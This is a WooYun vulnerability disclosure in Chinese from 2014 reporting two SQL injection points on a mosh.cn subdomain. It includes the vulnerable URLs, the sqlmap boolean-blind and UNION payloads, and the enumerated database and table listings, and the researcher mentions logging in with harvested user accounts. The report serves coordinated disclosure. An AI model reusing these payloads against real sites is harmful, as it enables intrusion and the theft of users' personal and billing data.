当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053162

漏洞标题:活动时旗下某网站2处sql注入危急近百万用户信息及账单信息

相关厂商:mosh.cn

漏洞作者: Mr .LZH

提交时间:2014-03-09 09:52

修复时间:2014-04-23 09:53

公开时间:2014-04-23 09:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-09: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-23: 细节向公众公开

简要描述:

活动时旗下某网站sql注入

详细说明:

漏洞地址1:http://e.mosh.cn/contectus/getContent?a_id=4
漏洞地址2:http://e.mosh.cn/god/getcontent?a_id=62

---
Place: GET
Parameter: a_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a_id=4 AND 4566=4566
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#
---
available databases [8]:
[*] furniture_show
[*] information_schema
[*] mosh
[*] mosh_model
[*] mosh_stat
[*] mosh_tuan
[*] newmosh
[*] test
---
Place: GET
Parameter: a_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a_id=4 AND 4566=4566
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#
---
Database: furniture_show
[79 tables]
+---------------------------------------+
| ADM_ADDRESS |
| ADM_CHAR_USER |
| ADM_CITY_ANALYSE |
| ADM_DEL_LOG |
| ADM_EMAIL |
| ADM_EVENT_ALL |
| ADM_FORUM_COUNT |
| ADM_FORUM_DISTINCT_COUNT |
| ADM_FROM_LIST |
| ADM_FROM_LOG |
| ADM_FROM_TYPE |
| ADM_GROUP_RECOMMAND |
| ADM_LOGIN_USERS |
| ADM_MAX_POINT |
| ADM_MOSH_BANNER |
| ADM_MOSH_NEW_USERS |
| ADM_SENDEMAIL |
| ADM_SENDPM |
| ADM_USERS |
| ADM_USER_ALL |
| ADM_USER_CONTENT |
| ADM_USER_CONTENTCOUNT |
| ADM_USER_NEW_RES |
| ADM_linkman |
| LOGIN_MONTH_USERS |
| LOGIN_WEEK_USERS |
| MOSH_NEW_USERS |
| MOSH_USERS_FROM |
| MOSH_WELCOME |
| activity |
| admin_event_users |
| admin_forum_note |
| admin_group |
| admin_group_module |
| admin_manager |
| admin_manager_city |
| admin_module |
| admin_primary_group |
| admin_shadow_user |
| admin_temp_cityuser |
| advertisement |
| advertising |
| auto_notice |
| city_thread |
| columns_priv |
| db |
| func |
| host |
| moderator |
| module |
| mosh_action |
| mosh_ad |
| mosh_app |
| mosh_banlist |
| mosh_captcha |
| mosh_case |
| mosh_city |
| mosh_city_lat |
| mosh_mail_queue |
| mosh_mcoin_tb |
| mosh_module |
| notification |
| permission |
| pic_num |
| porno_pattern |
| position_show |
| preorder |
| proc |
| procs_priv |
| register_mail |
| samecity_dragoman |
| samecity_group |
| samecity_person |
| samecity_threadgroup |
| search_keywords_log |
| seller |
| seller_image |
| show_image |
| shows |
+---------------------------------------+
Database: test
[17 tables]
+---------------------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------------------+
Database: mosh_stat
[3 tables]
+---------------------------------------+
| state_1 |
| table_info |
| url_info |
+---------------------------------------+
Database: mosh_tuan
[23 tables]
+---------------------------------------+
| tuan_change_coupon |
| tuan_coupon |
| tuan_coupon_num |
| tuan_delivery |
| tuan_email |
| tuan_item |
| tuan_mail_log |
| tuan_order |
| tuan_order_delivery |
| tuan_order_log |
| tuan_order_oplog |
| tuan_questions |
| tuan_rebate |
| tuan_recommend_class |
| tuan_recommend_relation |
| tuan_seller_application |
| tuan_send_sms_log |
| tuan_sendmail_info |
| tuan_shangjia |
| tuan_survey_log |
| tuan_trade_log |
| tuan_user_address |
| tuan_users |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

漏洞证明:

newmosh数据库里面的总用户数:

QQ截图20140309001143.png


拿前面2,3条记录登录:

QQ截图20140309002057.png


QQ截图20140309002204.png


数据仅做证明,并未大量获取用户信息。
mosh数据库里面60多万记录,可能是老库吧,相信其他数据库还有部分用户信息。
mosh_tuan里面大量账单信息,不贴了。

修复方案:

好好修复,好好努力

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-10 09:29

厂商回复:

嗯 一定好好努力,好好修复 ,非常感谢 !

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-10 11:18 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    被乌云君走了小产商,虽然得了18rank,实际只得4rank,呜呜,桑心死了,几乎是什么都没得到

  2. 2014-04-28 18:33 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    @Mr .LZH 同感,坑爹的乌云!!